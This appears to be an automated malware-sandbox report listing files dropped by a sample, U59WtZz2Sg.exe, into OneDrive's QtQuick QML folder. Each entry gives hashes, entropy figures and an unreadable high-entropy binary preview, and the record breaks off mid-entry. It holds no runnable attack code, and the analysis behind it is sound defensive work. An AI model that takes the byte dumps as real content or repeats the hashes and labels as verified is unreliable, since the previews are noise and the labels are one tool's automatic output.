Preview:	.......:om." ...MG..$.Wf.......'I..&..-.....N..:.Y.L.......\|W...d......I.....A...!..>.a.\}A0S.'0T.J%..kO&.....J.1...R."*. ...~.....]rT..._"...w..O...%...]^.d.en..........%Jz..a.!........j%....5l...F..Z.(..)K[...(Q.G`g....9..<...gs..Wge...APr_B.7..F..l...y.<.S?.p.S.$P~n..qm..y.....D~....&..l. ...4;.]..}j.....a.0..l<....^.r.1........Z..Kg7...g.....oDD..wB...C+..o.7p7.G..........'....fAhB L.i....X.O.]....atmv...EH@..~n....o.g../..h.1...a..P.<.&.0..Gr.P.T.0..tD...#...@7....[...D..~xo.H..jn.i./.-.6..{.F...B..^.......E..D....K.7......d(&.[x......;...S!.Va..o..i<je...Wh....A.:.T..GA..8v;T...sL2....>.@.r\|B.8...`..G........y../p.h.w....C/.....V. ..Q.mOo?.#....j)&..KdH.....5......W.....6[Y.....~ZO....I3=`O.Z.N..0.6T....".V...^./g..8Ea2....p...w..f..._...i+.d.....`4.BwMr[.\^.NY.]O)..PDGz......I.cr:2%8P....a..R...iHi.>...Y....M.G.V.Q5K.......B.......5.........x.a8...-.e4..../..a...%........O..b!.t..o.xo.v...Z...s......gJ..lKBp(.c.H.S..1.,

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick.2\plugins.qmltypes

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	188446
Entropy (8bit):	7.74770700106535
Encrypted:	false
SSDEEP:	3072:rCPYdjbCBpeHyShVS1WT3MH/X05qdfKqsMlbcMxxF7Mx4agKY:r1djbCDUyStYXEqdfKqLxr+c
MD5:	B469D7CC057A75AD809261107807E827
SHA1:	C51D2EB763C397419479B134B14C6F3A8D304BED
SHA-256:	9647B5BBD1430D78A26A3D4A5E00A645CC27469A46CE8A1A1F59DD2880E40E10
SHA-512:	60A8CBDCDB7101B2D111321CFED45C4738E03C9FDFF85AFDEC3382FC3BC4B3634E03CD248C7EDEBB2EE878A6FB5007D28E2B470EA93557A05A417748D1C003E1
Malicious:	false
Reputation:	unknown
Preview:	impor(..A....3(9.D.....}M...W..#.....+./u..P..~...z....l.y...#!.cby.....I..P;.Ki.i.zA1....8..!".Kt....(...O.B..bR..Q..\|.}..+.Q,.U.F..L7Z.&M.P...........H3.6......7pd.l, .d..{.. .\|...p.Z.#.?..}...i.Q.R..\gK.r-....T.G..?...m...y.[O..7...........G.....E.....F.....]e.R]...P./..8......M..8p[...Hm.B..?\|r.U.F.}Uc.....Ik?LD.J.)..e...q.......%.........0..R..l......o.m.u.......-......4.2.N....B......-^<.M/6.5."....0.[O...Qp.Z....l.......:......qX..q.5.....{Z%.BjZw.Q....pi....>V.I..%.@..z.k?..u-U..A......\......m..7.NU...050A......i..'.g.>4/27./@>.&h..H.9z...5..."..H.B..U..T&.....pG..MM.\.y0r.,.....MIx..;3....P..r...8...wy...V.Hf..z.h8e6.xNG.D./..5?.s..6.%ln....!.w..v.Q.'..#...S.....H..s...S..JX...+..\..j..C......y.. L..h..<.o..#....\.8.e'`..ev..J....,.u....Y$.H....$Lk/:}O.\>Z..'..c)..C.1..` 9.......g..RI..P.GoLc......fT..=...O.pj..}.t..`..'.y..@0{.N...*"..).?.. .B..l.B..y.}.Q)>k....q..q.....Pf.K....5.r.g.~+.;0Z..v...9.......=W~..Im..\S._.d...Y.D..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\Button.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4013
Entropy (8bit):	7.945445407585882
Encrypted:	false
SSDEEP:	96:id0tH/aNzCZLlD37eE8M8IcW20gIfmOWrx2n:9/aEZLla4YWehrx2n
MD5:	0989F682A1DE8BB5BED17375A3E2DDF9
SHA1:	2E405AC3FCFAD5A1DD1D69F178AE8B27D5EC6B2E
SHA-256:	B3D12582798A9A1C7C96AC95F387F8FB3DE1BC77B9D696EF61E5F64B0E3DC551
SHA-512:	79BB0A75CD01061AB8E7A5CEEAAD0DC36A4F508F461F9991A30C2EB0271103AF56BEEDA35714C3196BBCA56BB7CFF6A68B9ED91BEAAAD93BADC0ED53C435987B
Malicious:	false
Reputation:	unknown
Preview:	/***.....sQ.u.z}.~Z. .c%.w.z..V....\...u.MY..._V.]$.................<..Q..t.....p12....?.H...E."Jr...w.K....U...I...........@Sw...B...9#.>.P..3..+...i.T....Z.tb...^._.....~k..m.a.G.X.c.:....b..4[/..+.=.c..&!...6.8.[E$E...d_.;..jg.....o...`.d3.@Q{......}...<Y.J@.]s.y.;F.L.i\|"...s.I..v.q6...r&..X$d.-..Vq.....i.ht}b.UyC.bA...WE9...&.s......D....~...mzv.5Q.&....7l...c..4.....,.{ _...:1..w.....(P].....;.#....~.(}P`#..<7..H...c.6.0....t.^...E.D...:uF..\[.Dd.ll.........ga,.G.Qu\|.'......T:..Iiv.xs.Q..P.s._..O..S.z.?.......8.N.ter.G(.....3i-.0..PV....a.x.H......R....)..w...G.i....w..cN..Hx.0....W'X..z.z.$$Nl.I.E..X..7.E&..Q\|5.[.......r.q.3B.yZ...cHS.......$P........_...).....O%Z....5../......,.0....!..-.r0q2...E.:C.6m}..{. .tA.L.....s&..8....u.8.C...Q._b.K...)m......1..d..F.r..K....v.A..'.u.+......`........t.X../.V....~(\|......5..Y..G..8\|..5.N...S.DCI..8..s..u.d..H...N.d..:...(..c.P..s6a.c.y.SJ.....}u.B...W..d#x..Sc.X.e.x..hS..x..VY

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\CheckBox.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4412
Entropy (8bit):	7.96279089680795
Encrypted:	false
SSDEEP:	96:E5gz329VLNuXQgpY2g91U02INqX+T8lENnsRGjvOdj2+J2OFN+xgq:b3wVLNmfg92XE5qoj2dj2kFN+xgq
MD5:	A97DE6D640D79F3D7F706563E84BAD6B
SHA1:	CE6FE5C10FB0349A9EE65253CBC252F2F81ABF23
SHA-256:	67BE0DD5E6008D02CE7400AEF727A886B4D52F0C340B3D7D15F7EBD56F69D311
SHA-512:	D2AEB762BA17EBC22C711F79B8A236F3E0D4F4F929949811B348B649048F1443EC80B2054456BB5BAA3A8C0F20B68EA5689C791D3B92F79B2752CE29FDE8027B
Malicious:	false
Reputation:	unknown
Preview:	/***z']?......x..eSA%)Vv.p...H...#.nN.p.z.)..6...$.1.....%.".nUh.5o.^;."..w$.L\|..D84.I...7...FB.2.JO.l.....X......(....\|.O......sx%...Ia.'.w ..7...q....[...\d..;..7E.(c..e..[.v..D.....M.H.B..b.@...w....5.j._$'.Z...b.....Bc.m.9..D.{.S.~..6'... f.....]..>K..~.lr..b........=_.!..dd.g.ld].. ..-a.,U.G......l...I...o'(@..^....l....R..Z.tX'.T...T\..n.S4....Q....l......0(\|...(\..B..];'.A.@..iW. .[....O..E?x..K.......:.l.L2..)y..K...1...tn.M.m...V.......].0&..k......_.#-+....&..q.?l.=1.T! .j..=\|..ha........I.1....2._.U5.!....j..eT...5..Q....0y......'k..~.>.^.2r.../...P.K8.fO\|...F..Kw.K...y.}.TYn..!.bs...i...D.W.. F....0. ....'.{...z,...7......Ex.YZ.Wh......%..#t.....+...L....9../.F...O..n#".....8....Hm.(._...#/.;Y..e..3.Ft/..."Co..c.k;H.._3.......!.$.\.E...}./y.Q.B.k.z........#.."....n..9.-`.O.5]^.../... W.._^M.E....P'.N.2...W..{7.?...[1p..".....>&...>6..}sX...\|....".d5.........rnE.......?..U..%.S....6...6e....._SI~Q.y..ZV.@..D....e.;<.^.......f./.....+z.%

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\Dialog.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3983
Entropy (8bit):	7.952542830053607
Encrypted:	false
SSDEEP:	96:/Br3seJBto23gIyelUAuierskSiCkEA5cwqjhdw90PcvX:/Br3xJDo4WelrurrskrlDuwAdpSX
MD5:	CF86F4F2FB37925C9F03EE896B613534
SHA1:	C38748FCB3B3050C42D81CA21B16F2A7D3B024E6
SHA-256:	6219678C4D7CA2FA4366857DE5A81208C5DA56EEC15008724C1CD2B84050B15D
SHA-512:	7C22D55E0F4DD73B200E1D4D2686FABB1847C613E13129CCD3AA87339BC349EA7C137F6039FB825E2CD873466DFE93FBE3DD2ED685DD0C449A52E3BBE07D45C7
Malicious:	false
Reputation:	unknown
Preview:	/***u.^<.h?p.Z..i..../...6g....aB.z...B..`..]..%^z..,P..\|....e.k)...w.......V.4K...-.{.x....ElX=....E......D..P.f..>4.;.X....5q.vY...=...D..L].Q.p.`..Oh.7...Xu.pc...:..`.b...j.H.......T.'...(T.t..-.wryeT&.A....z.V5.b.E.....At1..$.D.....C>.>g[..-.8........U"2.1q..0....[An......l.k.....B......e;Lx.g2.!..$.K7.s....<k..l.\.=.s..M.....u.)....KA2}.1.R:5......LZ...;.....h..,..D..).?...(l=..............Y.........~N.:.\|..p...\h....j.....3........Z....a@$V..F.a4ed.'..}.l.....t...%SF&.........3.j.y..K..E.Xz.F..@....G....."....P..?..d.....q.j.L...b...t..'....w..t...,Z..4..$-.j....m.f.c..o77Mgi..a.../X.j...(..2...S;d....0 .l&.5..i<5].9b.+.g.........[}[:m?HkZ.$... .d.Hb....c.ob.K.Y=7...g=..!.SU.d..,....h)...._v.V....3...f.M.#k..\U.........{..}nL.W.[.....V..2V..w>S..N.wL.;..dtPi......F...o.9.8/.E...mA.../.0..@.U9!..0..\|8.O-..."Y.RC...<..a4...s.l....!.<...._C..........)K.-...I....x...(.;..g.%F..%.'3...F.g.9..y....Y...%......5.._..G...QM.0...3k9

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\DialogButtonBox.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3253
Entropy (8bit):	7.944362549422681
Encrypted:	false
SSDEEP:	96:ug4UFvllCN/dWhXiIfRPxjl9Vv4saNXHZYzj:ug5989MhycRl9qsaNXHZYzj
MD5:	AECE2B1EF8AAEB521B33AFC7DD87D0CE
SHA1:	98F00AFB8D7CA2BF21DDFD65B3463FB9081DD125
SHA-256:	E0441A63AE6F1B14D6C013993D835F8388E520F7969501DE816ADA523041512E
SHA-512:	F7ACD7AE7E3FC11DD73568E05B8994B300173819FCFBBD52CFFB77ECC9765330F6B1F5B612973096D17E1F09B2CEA455CCFC7C056D95F2A6CBAE0740546CA833
Malicious:	false
Reputation:	unknown
Preview:	/***.-.",zE.....Zc.a....G.y..=..._. .....+....G...{....f...O.U9.F/......%..>,.-o..:O..g....1{2.e..T<`.tWg...L...T2..8b...>..t......hW.?UY..SD....."..on!q.].........z.....{.U.s.F[0c...."....M6..I\|.. CP\|..ZF.)T.>wd...I..F...zT5...B?rWq....27..J.y..c.........N..]...@..GihK}.x~u,a."_+.%......0L..3.H..L.."E`\|lA...3..a.s....z\|.=aA........s9..c..?K,.....3......q..?./...M.4N..N......4.O..(6.....Fn...z...J./..-..$..y..;..\|...\|.8...M6{...W....8...W...0..4C.e.L." ...;..C.<.t.t..X....@1....>NV...Y...z.C...=.>? ..v[.(..`.:-.B.9.yD....Q..4+.mP..5.v...?.s.M..0......Q....5.o...+......2.p.M.:.NG...K.eT.{p..Hj.O......Q.a}.K.Q.........2..d.bK9............2..K.}sS..#"%..I...i&`...3...=M.?..#...1D....Z,..<S.A.bc.s...fc.....C......w.........E..4p.R..%.J......L.D.o).^.X.p....]..\|.tiw..sQ..O.D[..q...?..v>......x.9.tzo....}'.......6.U.w3....8...ym.s]._...$..$Ll.\g.~.m.-.......:...?.[A........}....J.l......G.%..)^>..j7.\| 3Y.....m.....(.:..yJ..T*.R.4.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\Label.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2337
Entropy (8bit):	7.929326488526167
Encrypted:	false
SSDEEP:	48:HGgBa3qPUkzJqGRrBiHsD3l+gQesKAar1QOknEaRfA1ZQD:PBa/kzJqEroMD3lA9KvnkFRfA1C
MD5:	C954EB35B1EB29DA6510EAF1F6C35813
SHA1:	EAD9A2CA9D2C589D86F7DAE38D0F871C1CE46879
SHA-256:	1BB162913399EEC065C432CF5CA4FF5DD7957AD3DE675CC9A577CEA17DC1DAE2
SHA-512:	D7E80C06F231A6D2E7771D4230A47279498B17C7E1522D444EEDABCFF1645049A6F00214793A43A9AF08081566BC0E8832FC7135A1A7602BA9DB51831BAAA9CB
Malicious:	false
Reputation:	unknown
Preview:	/***..,.....U...._.,...........u.M....~.mq..c\|.e.f....0}k....B.;tX..vqe6..3...7.bo.J.I..S+.P....$~.E.Y...;..0#..#.i/n.9....g.[#U%.I.T.,.u....S!..N...P..F...(...`.H[.Ks.GX.....'B.+s...b.p........Q8...+%..{..J.f......9.WaC..n..N....IU.On..CH......oAO.X.rD~..\r...p...[."..K..N....2...J8.i.. .c...x.Z....){....'...`..b........i.s.A..R..BK.I...:..d....gc.x....3k!.N..t.:j7bK.. ..W.3...Q...l.....O.'..~.\...b....f...g...S......y{?.9..9.L.X...::..,.-..,\.%.:`.k.l..P..'.f...8...gs[..H.\..!n...Ml..Q.C.).m.s/<0-..:y]..m......}..&(./z+...W...J......0.......a3.>.3..o..9..3l..'P>.l..vl..Ou.]v.....z..y\|i8.{3].f%Q.2/+3>.D..No...r.S".Y.x#.@6.\|.R)C.,AeE%h/..aH..y.+.j..#.1.s......D.%..F}.Y-0...;:N..>.G0l.?..h.:.gE.........(.........~.Lyp,.U.HF....%e.i"9..(fT....4....,.q.. ......q.Y.....J.....X.b_.I..b.......s.%.=4..h.A>..NG.:LO...A.?#..\.H....NM^,.I.\.`.... ..s.&..%c..t..K.u...&.E7;.XbJ......P....D.."...l.9..J.u..N.p.lq"h.P`.f..o...x.5.Q.}.j.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\Menu.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3442
Entropy (8bit):	7.938023267023901
Encrypted:	false
SSDEEP:	48:ZfIAuB40+K9/2457HaDamvzoea2LoKZG2jl3ssnLXpF3w8jG7cr6Nk7lMbJdkhlt:ZfIAEtP9/24576OaBLXQ8Ak7uJdMCu
MD5:	97216AA4A11AEC05D6A39E2AC78A1DF1
SHA1:	2619DAA211AB4CDE4B684085E8C8A25CC1EC6AF8
SHA-256:	1EBA1F114E6D79363179117573D3E5FB5653075AC9E9B277D8759556F6E502C4
SHA-512:	31BE5C7B93415A315F00B1DD07C23F801B90315141CE264AA537DDDC204269CC29D2A894154BF274CCB674DC295517602245C33BB5602EC34344F1A237C25726
Malicious:	false
Reputation:	unknown
Preview:	/***..jU.. n.z...b....v@...^..T..{.....m.....O.e...gh;.u.w....C.y."......O.E.Ab4-..kJ..E..........r........A..........r.S+.^\|k...!.t.S.el\.Q.B.{.2.b.g_s.I._{;..3o...r.T/.%.c.........~..,.......fxO8...U0.z.\kU.i2.....wR.)7...Wy.."..kg....z...j.x......C6.....B...t^.J.6{.......l...I....G......r....:8../Pe>'WN..O......-3.(1...B.....lBO+...6..B.lZ0..}$..e...W.8.t..3.V..YH....Q.j{...&.....;'(..au:`..+..+.oEG.......AZ.u2 .s..H/i....Y".]....!...'.2...\|...v6x..0...C.%.e...;a....AQ.\|c...2..M.$k.E.u.......'..c..=..3.........Yw.tB.?......v....zb`;..Q.....=H4...rt....,I....3.._7ok.n.=.......<.wH..E..x.8..T.DZ.2....,+K......M.eq.B.Q{...$.3..U..!....> ..@...Q.........c.%K....9Sn..t..T....(.G..wDl..T#..K>...%r..g..5.....$..u.5....$.).I..P..k@OW...f.....,...n.R..C6./K..+.I.5...nth.gz.lM.!...^e..S.n..5.;J!...d.;G..P..f%.0.\|o....v."....ce...G...............I%..R*U.2`3(...L.S..X..3.y;.....R..r..d...H......RJ...Qi...q..m.v.f.?.O.......F.z+.G.....G.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\MenuItem.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	7.959458545208548
Encrypted:	false
SSDEEP:	96:6+HmURqn9G4K0n67H9bFzfq8+XTmgQnInNzYg13pgOnuIA0fehY:6SmP9GB7H9bRZ+4nIn53duIp
MD5:	A37B169A5432E1AE4CA4AF71E8495A72
SHA1:	A9C126D434AF1075EF0701231A7112DD8F91578D
SHA-256:	2B814E24D93D77D0FD879C27C5A2B521F5B15FDE64CCD60EFC2555B8BAEF4FB4
SHA-512:	2F6C02EA0D043147A1B492D3E6FDB4D55653ACA9F50FAB53EFF5ACB08F3F3E09D8421033009965338635C401454A343C5A282EDA5A888CE23A5C241A1BFCA960
Malicious:	false
Reputation:	unknown
Preview:	/***..?S.9....'.N.7..o3I...b.1.%..7..#I....T..c....a.......{.9'....T.T......Y3..?w.;.....IKz.S.. ...'v..Q.6..7_.C...-...1....')%~..Z..j.<...d.'.}.Q.CP.L.D.>.....C.J...~./.{..._.Q.j...a..a...W..d.lv...T.i.....hH.....4q.\@...,&$.....5...@.,L4.)..E.ak.[...cF.7.x....A........0.\|..u.aB.....d..8[.g}>...<6z[.Y.Zy..>...z.I....'BfV...S.(.$.xX,.R....Fr..~)HZ.u.....t;_........j..u....v..Yt.........f[..[..[]............0o. .... 'm.'#.R.M.f....xO....N...2+/...wr.&..$y....Z[..3-.oU.H./G.I.dT.].X....c...`..Hf..5...X[&."9x.>.#&..-#.dL.$...<\|.I...4A..N..A....P.6G}.;K.....I.).8.Wh<0.j..\|.}4q..hG......T7......^.1.=....04o....w..7..p..G.5..q\|./.$..NJw..{..D.r1.......g.....t...z=Q......;.z.....1.....,..Cx..,.S:........[mt..A.=.6.....1jf...I..CxA.g....'l...U...{./]O.;........D../..}1A.d0Cz..7.../y2:..n..KP...\.M..`E^^i...(...&/.zb;....R...^......?".F...V.V.9.d....a..M..:..>..F.....V...V5.g..pv].@.x.9..^6 ..X3L/).8O..5.k.w,.....3...']^.r..5...x.G<.%&..x...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\Popup.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3197
Entropy (8bit):	7.937445972506662
Encrypted:	false
SSDEEP:	96:73p7bk4giFCTtbQF6gGREUY/XdguLJcrp:j24gi8JREUeNg6JcN
MD5:	55BAEEE01EE7610606AEB3F74B8ACAFE
SHA1:	705B4F8703BD8FC87B51758F838F49D366D408D5
SHA-256:	CDCCAA67819443CB625237B8628594334ED5DCFE4CF07424BFBF25C4DC1668A6
SHA-512:	12210D2105F646FC2CEABA9C399F122EE634BADEDE252A63D7215E1992E594AB4D10DACF9CEA52382486CB8D10A089A5857EAE4B79A959114A6FA1EEB9872A01
Malicious:	false
Reputation:	unknown
Preview:	/***..@?G8........p..7?.p.8.......!..<P.H..F.......].......4g4........A]..O.nr/{..'n.xO...d..1..".aCQ.-8...o....0..~'......s..2..`..u_..GH....m]HO.......p.q#.eI.r.i.:d.-!..e.......R....x....V.48..=.\|................Z%.Pb$.C...=y..G"..;...!N...X...P..gL..=......v....."..fC..;.G...6._........u...iu.Y...e....1.....Z..b.k..B.....L.i\|.#hc..\....Z.1e..........>...g..n.....7....N._..B..%.c[..`.!.\F..>.....3..!..q\|"5Z.w\"...V..6....%P(......H#...s..(.R)(A.W.i...'D.//.X.b..-........#NtV...}..A...(;b...\|n).".bZ.#\.&.D..;.3...1..0r....f....z..Hg..O...].V..h....=E.'..W..........AgP..j..J,.$l.P.j..........Gu.Z................MaJ>=I.ap....;`.<..v...v..<)=....l.$.=..V.a.]....t.....O..oX.^B...\.)j..V......D..'5.....$....I$.Q..x..<.n..ic....@?......X.S.!99w..A....).....Y...'Y2.......&.IVc...D...1.//......ZlX_.c.s.........MT\M.o1.P.wK........t....B..\|...H..wU.]......N..O(...Bh."JS.X...M...W=X...b...n..:..d^mN.0..m.v:..].1....&.H..e..2.x.T.v.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\ProgressBar.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3062
Entropy (8bit):	7.929835732579142
Encrypted:	false
SSDEEP:	48:zbDtFi2SoyvYKMy/v9aWDV1imMKOOB5Ld99zljpM898hAulo2CfCJJ9DCtscr/yM:z+bDv93jfimaOBbzljC8ehjKCT9DksYd
MD5:	0E88CAD38C68871E895F3E72AAD4A3D5
SHA1:	E6F05338DA69E36D23CF84CA92F742CBBF827008
SHA-256:	E3996D3740DA10347702F02458FBE0BE0C8F941A62368D195ECA0E2E8E6E3486
SHA-512:	03133066251556D631FCD3B325516D968AF7DAF4EC3B4D7EE0A0F096A5D95C9C7E625AC9557718E8DACB110A72450CF324E699AF81C63A41685FE28F01A53430
Malicious:	false
Reputation:	unknown
Preview:	/***...X.d..YGI{...X..af.<..p5....Z&.A.T[...H..C.<..2.n71.?.k..1.....7-...r.a...G..P.P...382....x.......Kz..m\..."5.e?.......oL.M..8.N....L.>........v.Az...F.t./..z......Y.\d.....G.G.....Z!,....9H......zM.E)r...L...a%.......nZGa.....=..Y..}...[law.R}....}"x.8=NM.#.....}.Dk...M&J:c....3....k.<.D".}E=..d. .OjU%V...HO..n...:.7...h?.;.T.r...5\|.~.T.F.U.<j.p..}.z\.Yh`...W...../n.......p..L..9v... ........9B....-.$4.C.r6x...~].Fk..r,..4.dV...A.N....%.?...:m.......(....0EGx.yk{.....v....F.I.9..4...5\.......d}...`...3..Y...C..:<...-...v..2@,.....9..~8]L..Pk..;.Eq.O....D88..{.[...[.q(.c,. FT....5....Q.,.?.m.E..V.>..]W.[F.$k.{.);...{.._.R:.V......z. ...s....).hY...Rd9=...QY6.6B b..L9....?>...............\|.........A]m.P.uLx]%&.i..d.n.{..LW.<.J...a]Fm%.R.....''yE&...rV.........E%......G.I.{.jAS>....g.=..W..F................6jFU9....7z\|B&....(~<T{..V...7...I.....z...../B&..?.O.....&.x,c'lX........?.0:-n....Z.uA.s4ye...LVyA...mI.....=...:.\..._....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\RadioButton.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4103
Entropy (8bit):	7.9547954982150175
Encrypted:	false
SSDEEP:	96:O1zRbwRdFIr9afV5Xe/GXFvuRPAzdShSteOt6CXyK1FY:4RbSyo5XHCA5s23Xp1FY
MD5:	0D33B4D33ABCABDE9B68D2D0C91A546C
SHA1:	D649F2F987F0C5CE743467C5ABACB5D1D30EFDEA
SHA-256:	53AD8AF94E2397CFA37DC6B62821831EA771CDDED04C06B1BECFBABE605534AD
SHA-512:	CBD5C440CD7360821DD3AB9613EEEFADD7F34F7B6B30F325010B53D7FC36943B1D2E0693D412104F6C432A591301917B56587D81F6C93F0ED1F9227C432B6E56
Malicious:	false
Reputation:	unknown
Preview:	/***...1.I..4.g!. '.J..a..B...&.P....,Za.f.{..ic].s=..UM..\|y.a.[..n..=..o....!p.u.q.)6#..V.6C.3y..sW..j..0.j....q.U..@.........\|.....+.y..pi.......";...x..O..M..Xs-....#\..g..!.......p...h._qkU..?..j`e...k...@..F.#.x..#.f.W^.>.B..(.^.:.(v=.M.\..%.b9}e.S....m\|.hD.")a6F.T.iy....K....x.....z$.;q.4. j\|.L?`......O.jl..V..z.i.B.;.uA...Z.m;rb..^.>.6.-?.JaL..x..C..@.$... ;.......(`!.d..QG.......z...q}4.E...8O..a....-..:.cf...\|.]x......_.........s....By.n-Y#..{..W.c.t.Wn......u......v$/T...?.#..V..Y<...C.FH.8...I...B..!o\w......a`.D.^:m..\|.z4....j<..[..,!.....y`d...`..y..9K...*..=.U<....x/..U.E.y...0. I..._2'...~M..r..+.......2e?$.1.^.,....-........#;..O.T...D%i(...t0.(t..1~SW..-`l'...7?T.....YK....n..f).Z...(.8..-C.d.....\.)l.U..q......v.-?...g(x.......Q..D>...=.q.^..(....$+r.)..r..T.R..U..#.h.gd.........!..V[4l.`y...y9.0t.#..).01..."......CA..!J'>. ..~...M1.v.+.m.........8`"..0..W.A..G.........h.z..J...x{..........`#......8#.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\ScrollBar.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3457
Entropy (8bit):	7.9515201686721495
Encrypted:	false
SSDEEP:	96:dGISBfHfedW17SLELHkicZVijP9xg22mTBW:3SBf/717SLELEFrKrQmTBW
MD5:	C682D9608F4AA571D5191FE8F8F5C981
SHA1:	7B72FC015395EC2FE2A20F5CCD8A677D51978E9F
SHA-256:	7DEF0C492D949806DA7F17A6DE6D01F2B30D518387748CD65F9EB4E66F3EF434
SHA-512:	B42BBEA986A8DE623265F4BA71A8EF1781BB960E9AF89E59DA6966904DFC05ADF687655F1F8259F261CE939ED49C10A7CBA7DF115E204A33B8C5FDB0D8F37092
Malicious:	false
Reputation:	unknown
Preview:	/***;Vz.!.,...9.....D...=.'.Bhj....u..`y(.Te.....+...v`..e../+r.5..%....^....As;U....Y..._......G.6.Za............=...o..p0}..u..F........wj..R....!..2......?:......8.....m..+.......(....H..U...G.v..g..[.8.ID.^. .;...5i..t ...7...Li..^..>.&.>Q.z9....Q88..@.".].eO.g1..u(.T.H.........i>z.?.y....T...`.E.e....p\;.!p...J;...........\|.2.+@...H$.iN;..v.l.`G.>`'#."e...O.+.w.R.~6.....j.u.}9....mX........K.F.......{^.,.J.g"lA..d..L...1....<'.X....R...D@.N........!.=.h./Uh.... ....x.............!.(..R..1....,....?.4q.=hB....!?..\|..%.V... Dd.j..S.s.....8T.\......z ....Y...]f\.Ff/h..u..4<....{....xR.-.........t..?m...yZ..L.\D8..8E.S...p.bU..8.~$u..y...q.....@..~.=3r..[...R,.......^..R..Q.>/.....&c..BF.K.[.a..H!._-....q:$...e.hf.......CO....c...$Q.yP..g.U..b._..m+#....?..eq...k.L.z...\|.Y..._&.x.)..5......)y...6..w..t..j...c.._.n...vp.V.J....`.q.k.{fI}.+...0.._...OK...]..-..../...7."...yy..32..;L^.....>G_`.....{*.3.0.;9W.Tzg..-.n...F.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\ScrollIndicator.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3308
Entropy (8bit):	7.938811713103797
Encrypted:	false
SSDEEP:	96:U963ZsY05XNUwwf/YLWSYPjV9E/0SVw4s1:UGsYUuQmV900Sq1
MD5:	FF5D085B61EBEA459E0F5BFBD296E55A
SHA1:	2639245E3F28859D2EF3385F44202CE31E5C9275
SHA-256:	FA37DEECE0C874BA80D71EFAF3ADF4FFCD45C667184F89AA4EB5797CE36C5969
SHA-512:	119A567C841C5BEDDBD48A1764B651BFB4FC6091E3CA80D84F337D1736BE88C9A26ED41A7F0EBD9C9F3186E7AA99540E523D46A9CF63C42530737C91177EF4D1
Malicious:	false
Reputation:	unknown
Preview:	/***U=S._........5w.8..E..v~.w...:UO...z..;.....H..vt.e#..L=.7....._.....[..r..b8.+.,'..e........[....,...h.@...h$.K...`.`#^.90Xm.M.[<.....t.x..\|]^.-....SE{.)..H..K5...4i`....S.S..7.....\|.......A..........~..j.g.~3.0...$8$...2.o2j%.#Z......s......3k..T..w........?762,.2s+m.v.Gd..J........(.}.N...V_p. ....m...2..Q...W..h.q,.`..oQ.QZ.@.BC.LM.#3.Z.sb.._.3.........K.<z...rfu.f1~D.f.#V^'...Wmo+.DD).....V....0(..y.dp.}..c.j..,S....C.>)......E...7hh.h.........YZ\Y..;..-..3.....`..v....g.P....J...^.A...7.U..o...../.....B....G..mI}#.. .~......a..0..+FUC.>..lb.....r.iU.&j.#..8....C.......{`...Ld....[.}.;...`K.V......8E4K.......{...!.... 9......../].....\.A..]..];y.^..w...#.n.(....i..'....Q.r.+....e?...>.?.k2.X......;.#.jR........P:.u}:...C...y...z....j..j...p..'..Cbv.Z.,.A..8....71.e.....T/...>$.\M?."}..TX<....K.h.....U...............I.P..Y..."`4..o.=.V.$#Ej0;...m.<.o.\|..8x./.&.........?D.)/...Ix:H<......Y..n.C.k.P....+....rnb.5 c..`0G.<..}.L.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\ScrollView.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3226
Entropy (8bit):	7.942176438487088
Encrypted:	false
SSDEEP:	96:A5/Yu7BrZlBPSMsAkMSZsTsyTzCzDrEB6H:Ah/7BrvBPSMs/loJaXq6H
MD5:	1E8CBA0470FB5D4B9032DA9F48EA4C6B
SHA1:	146B4818B5CA7218251FD0A7F93243D26A6A0FA7
